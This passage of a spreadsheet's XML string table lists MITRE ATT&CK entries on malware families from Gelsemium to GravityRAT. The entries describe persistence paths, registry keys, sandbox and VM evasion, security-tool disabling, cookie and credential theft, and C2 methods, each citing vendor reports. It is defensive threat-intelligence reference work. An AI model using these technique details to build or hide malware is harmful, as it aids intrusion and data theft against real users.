    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has used unverified signatures on malicious DLLs.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has named malicious binaries `serv.exe`, `winprint.dll`, and `chrome_elf.dll` and has set its persistence in the Registry with the key value &lt;code&gt;Chrome Update&lt;/code&gt; to appear legitimate.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to store its components in the Registry.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to use various Windows API functions to perform tasks.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to use TCP and UDP in C2 communications.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to compress its components.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can drop itself in &lt;code&gt;C:\Windows\System32\spool\prtprocs\x64\winprint.dll&lt;/code&gt; to be loaded automatically by the spoolsv Windows service.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can enumerate running processes.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can open random files and Registry keys to obscure malware behavior from sandbox analysis.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use custom shellcode to map embedded DLLs into memory.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can set persistence with a Registry run key.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can check for the presence of specific security products.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can determine the operating system and whether a targeted machine has a 32 or 64 bit architecture.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to distinguish between a standard user and an administrator on a compromised host.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to perform timestomping of files on targeted systems.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use junk code to generate random activity to obscure malware behavior.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use HTTP/S in C2 communications.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use a batch script to delete itself.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can drop itself in `C:\Windows\System32\spool\prtprocs\x64\winprint.dll` as an alternative Print Processor to be loaded automatically when the spoolsv Windows service starts.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on local user accounts from the victim.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on running processes and environment variables from the victim.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on network settings and Internet proxy settings from the victim.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) collects information on programs and services on the victim that are configured to automatically run at startup.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[GeminiDuke](https://attack.mitre.org/software/S0049) uses HTTP and HTTPS for command and control.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to run executables with command-line arguments.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to inject DLLs into processes.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to identify running processes on an infected host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to identify the computer name and Windows version of an infected host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to identify the current username of an infected host.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Get2](https://attack.mitre.org/software/S0460) has the ability to use HTTP to send information collected from an infected host to C2.(Citation: Proofpoint TA505 October 2019)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) encrypts data using Base64 before being sent to the command and control server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) terminates anti-malware processes if they’re found running on the system.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) deletes one of its files, 2.hwp, from the endpoint after establishing persistence.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) lists the directories for Desktop, program files, and the user’s recently accessed files.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) can download additional components from the C2 server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) stores information gathered from the endpoint in a file named 1.hwp.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) checks the running processes on the victim’s machine.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) enumerates registry keys with the command &lt;code&gt;regkeyenum&lt;/code&gt; and obtains information for the Registry key &lt;code&gt;HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) establishes persistence in the Startup folder.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) checks for anti-malware products and processes.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) collects endpoint information using the &lt;code&gt;systeminfo&lt;/code&gt; command.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) uses HTTP for communication to the control servers.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Gold Dragon](https://attack.mitre.org/software/S0249) uses cmd.exe to execute commands for discovery.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldFinder](https://attack.mitre.org/software/S0597) logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node.(Citation: MSTIC NOBELIUM Mar 2021)  </t>
  </si>
  <si>
    <t>[GoldFinder](https://attack.mitre.org/software/S0597) performed HTTP GET requests to check internet connectivity and identify HTTP proxy servers and other redirectors that an HTTP request traveled through.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldFinder](https://attack.mitre.org/software/S0597) has used HTTP for C2.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has RSA-encrypted its communication with the C2 server.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>The [GoldMax](https://attack.mitre.org/software/S0588) Linux variant has used a crontab entry with a &lt;code&gt;@reboot&lt;/code&gt; line to gain persistence.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has decoded and decrypted the configuration file when executed.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) can exfiltrate files over the existing C2 channel.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) can download and execute additional files.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has used decoy traffic to surround its malicious network traffic to avoid detection.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has impersonated systems management software to avoid detection.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has used filenames that matched the system name, and appeared as a scheduled task impersonating systems management software within the corresponding ProgramData subfolder.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has written AES-encrypted and Base64-encoded configuration files to disk.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has used scheduled tasks to maintain persistence.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has been packed for obfuscation.(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) will check if it is being run in a virtualized environment by comparing the collected MAC address to &lt;code&gt;c8:27:cc:c2:37:5a&lt;/code&gt;.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) retrieved a list of the system's network interface after execution.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldMax](https://attack.mitre.org/software/S0588) can check the current date-time value of the compromised system, comparing it to the hardcoded execution trigger and can send the current timestamp to the C2 server.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021) </t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has set an execution trigger date and time, stored as an ASCII Unix/Epoch time value.(Citation: MSTIC NOBELIUM Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) has used HTTPS and HTTP GET requests with custom HTTP cookies for C2.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldMax](https://attack.mitre.org/software/S0588) can spawn a command shell, and execute native commands.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has been packaged with a legitimate tax preparation software.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) has exfiltrated host environment information to an external C2 domain via port 9006.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493)'s uninstaller can delete registry entries, files and folders, and finally itself once these tasks have been completed.(Citation: Trustwave GoldenSpy2 June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) has included a program "ExeProtector", which monitors for the existence of [GoldenSpy](https://attack.mitre.org/software/S0493) on the infected system and redownloads if necessary.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) constantly attempts to download and execute files from the remote C2, including [GoldenSpy](https://attack.mitre.org/software/S0493) itself if not found on the system.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) can create new users on an infected system.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493)'s setup file installs initial executables under the folder &lt;code&gt;%WinDir%\System32\PluginManager&lt;/code&gt;.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) can execute remote commands in the Windows command shell using the &lt;code&gt;WinExec()&lt;/code&gt; API.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has used HTTP over ports 9005 and 9006 for network traffic, 9002 for C2 requests, 33666 as a WebSocket, and 8090 to download files.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493)'s uninstaller has base64-encoded its variables. (Citation: Trustwave GoldenSpy2 June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) has gathered operating system information.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493)'s installer has delayed installation of [GoldenSpy](https://attack.mitre.org/software/S0493) for two hours after it reaches a victim system.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t>[GoldenSpy](https://attack.mitre.org/software/S0493) has used the Ryeol HTTP Client to facilitate HTTP internet communication.(Citation: Trustwave GoldenSpy June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) can execute remote commands via the command-line interface.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t xml:space="preserve">[GoldenSpy](https://attack.mitre.org/software/S0493) has established persistence by running in the background as an autostart service.(Citation: Trustwave GoldenSpy June 2020)	</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has had null characters padded in its malicious DLL payload.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to delete emails used for C2 once the content has been copied.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to side-load malicious DLLs with legitimate applications from Kaspersky, Microsoft, and Google.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over DNS.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate documents from infected systems.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has used a polymorphic decryptor to decrypt itself at runtime.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to disable Microsoft Outlook's security policies to disable macro warnings.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate data over the Microsoft Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has impersonated the legitimate goopdate.dll, which was dropped on the target system with a legitimate GoogleUpdate.exe.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to  enumerate the infected system's user name via &lt;code&gt;GetUserNameW&lt;/code&gt;.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477)'s decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has checked for the Google Updater process to ensure [Goopy](https://attack.mitre.org/software/S0477) was loaded properly.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to maintain persistence by creating scheduled tasks set to run every hour.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>[Goopy](https://attack.mitre.org/software/S0477) has the ability to enumerate the infected system's user name.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over HTTP.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Goopy](https://attack.mitre.org/software/S0477) has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can identify installed security tools based on window names.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use SSL in C2 communication.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can utilize web services including Google sites to send and receive C2 data.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has added BMP images to the resources section of its Portable Executable (PE) file increasing each binary to at least 300MB in size.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use malicious browser extensions to steal cookies and other user information.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can bypass UAC by registering as the default handler for .MSC files.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can capture clipboard data from a compromised host.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can steal cookie data and credentials from Google Chrome.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can obtain C2 information from Google Docs.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can decrypt its encrypted internal strings.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can block the Deibold Warsaw GAS Tecnologia security tool at the firewall level.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can hook APIs, kill processes, break file system paths, and change ACLs to prevent security tools from running.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use a DGA for hiding C2 addresses, including use of an algorithm with a user-specific key that changes daily.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has used compromised websites and Google Ads to bait victims into downloading its installer.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can parse Outlook .pst files to extract e-mail addresses.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can send data it retrieves to the C2 server.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can delete .LNK files created in the Startup folder.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can download its second stage from a hardcoded URL within the loader's code.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can log keystrokes on the victim's machine.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has infected victims via malicious attachments.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has used malicious links to gain execution on victim machines.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has named malicious browser extensions and update files to appear legitimate.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can store its configuration in the Registry at &lt;code&gt;HKCU\Software\&lt;/code&gt; under frequently changing names including &lt;code&gt;%USERNAME%&lt;/code&gt; and &lt;code&gt;ToolTech-RM&lt;/code&gt;.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use MSI files to execute DLLs.(Citation: Securelist Brazilian Banking Malware July 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can execute through the &lt;code&gt;WinExec&lt;/code&gt; API.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>The [Grandoreiro](https://attack.mitre.org/software/S0531) payload has been delivered encrypted with a custom XOR-based algorithm and also as a base64-encoded ZIP file.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can identify installed security tools based on process names.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use run keys and create link files in the startup folder for persistence.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can list installed security products including the Trusteer and Diebold Warsaw GAS Tecnologia online banking protections.(Citation: ESET Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Grandoreiro](https://attack.mitre.org/software/S0531) can write or modify browser shortcuts to enable launching of malicious browser extensions.(Citation: IBM Grandoreiro April 2020) </t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has been spread via malicious links embedded in e-mails.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can steal the victim's cookies to use for duplicating the active session from another device.(Citation: IBM Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can detect VMWare via its I/O port and Virtual PC via the &lt;code&gt;vpcext&lt;/code&gt; instruction.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can collect the computer name and OS version from a compromised host.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can determine the IP and physical location of the compromised host via IPinfo.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can collect the username from the victim's machine.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can determine the time on the victim machine via IPinfo.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can use VBScript to execute malicious code.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) has the ability to use HTTP in C2 communications.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[Grandoreiro](https://attack.mitre.org/software/S0531) can modify the binary ACL to prevent security tools from running.(Citation: ESET Grandoreiro April 2020)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) steals files based on an extension list if a USB drive is connected to the system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) has been delivered via Word documents using DDE for execution.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>The author of [GravityRAT](https://attack.mitre.org/software/S0237) submitted samples to VirusTotal for testing, showing that the author modified the code to try to hide the DDE object in a different part of the document.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) has used HTTP over a non-standard port, such as TCP port 46769.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) supports file encryption (AES with the key "lolomycin2017").(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) lists the running processes on the system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) creates a scheduled task to ensure it is re-executed everyday.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) uses WMI to check the BIOS and manufacturer information for strings like "VMWare", "Virtual", and "XEN" and another WMI request to get the current temperature of the hardware to determine if it's a virtual machine environment. (Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the MAC address, computer name, and CPU information.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the victim IP address, MAC address, as well as the victim account domain name.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) uses the &lt;code&gt;netstat&lt;/code&gt; command to find open ports on the victim’s machine.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects the victim username along with other account information (account type, description, full name, SID and status).(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) has a feature to list the available services on the system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) can obtain the date and time of a system.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) uses HTTP for C2.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) executes commands remotely on the infected host.(Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed).(Citation: Talos GravityRAT)</t>
  </si>
  <si>
